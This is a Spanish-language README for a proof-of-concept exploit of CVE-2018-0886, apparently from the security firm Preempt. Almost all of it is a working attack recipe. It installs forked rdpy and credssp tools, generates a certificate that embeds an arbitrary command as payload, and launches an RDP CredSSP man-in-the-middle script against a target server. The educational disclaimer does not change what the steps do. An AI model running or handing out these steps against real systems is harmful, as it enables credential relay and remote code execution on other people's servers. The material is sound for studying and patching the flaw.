
Un código que demuestra la CVE-2018-0886
Este es un código PoC para explotar CVE-2018-0886. Debe utilizarse únicamente con fines educativos. Se basa en un fork del proyecto rdpy (https://github.com/preempt/rdpy), que permite también el relay de credssp.
Escrito por Eyal Karni, Preempt [email protected]
Si utiliza Ubuntu 14, revise el archivo install. Fue probado en Ubuntu 16.04.
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
Exporte un certificado adecuado para autenticación de servidor desde cualquier dominio. (Se utiliza para RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
Para generar un certificado que explote la vulnerabilidad (contiene el payload), use:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert es el certificado exportado del paso 1. exploitc.pem y exploitk.pem son el certificado generado y la clave privada, respectivamente)
Para ejecutar el script de ataque:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
Más detalles en la sección de uso de los scripts (--help).